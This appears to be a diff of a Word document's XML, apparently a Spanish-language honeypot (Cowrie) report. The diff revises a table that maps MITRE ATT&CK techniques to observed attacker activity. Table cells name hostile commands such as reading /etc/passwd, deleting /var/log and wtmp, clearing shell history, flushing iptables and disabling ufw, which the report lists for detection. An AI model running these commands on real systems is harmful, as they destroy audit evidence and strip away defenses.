-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Account Discovery</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">T1087</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Comandos cat /etc/passwd, whoami, id</w:t>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Persistence</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Create Account: Local Account</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1136.001</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">useradd, adduser</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15414,85 +15437,89 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Lateral Movement</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Remote Services: SSH</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">T1021.004</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Sesiones SSH desde IPs comprometidas</w:t>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Persistence</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Scheduled Task/Job: Cron</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1053.003</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">crontab -e, | crontab -, /etc/cron</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15500,85 +15527,89 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Command &amp; Control</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Ingress Tool Transfer</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">T1105</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Eventos cowrie.session.file_download</w:t>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Defense Evasion</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">File and Directory Permissions Modification: Linux</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1222.002</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">chmod, chattr, chown</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15586,6 +15617,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -15607,64 +15639,67 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Indicator Removal: Clear Linux Logs</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">T1070.002</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Comandos rm /var/log/*, history -c</w:t>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Indicator Removal: Clear Command History</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1070.003</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">history -c, unset HISTFILE</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15672,6 +15707,1177 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Defense Evasion</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Indicator Removal: Clear Linux or Mac System Logs</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1070.002</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">rm de /var/log, wtmp, btmp</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Defense Evasion</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Deobfuscate/Decode Files or Information</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1140</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">base64 -d, xxd -r</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Defense Evasion</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Impair Defenses: Disable or Modify System Firewall</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1562.004</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">iptables -F, ufw disable</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Credential Access</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Brute Force: Password Guessing</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1110.001</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Evento cowrie.login.failed</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
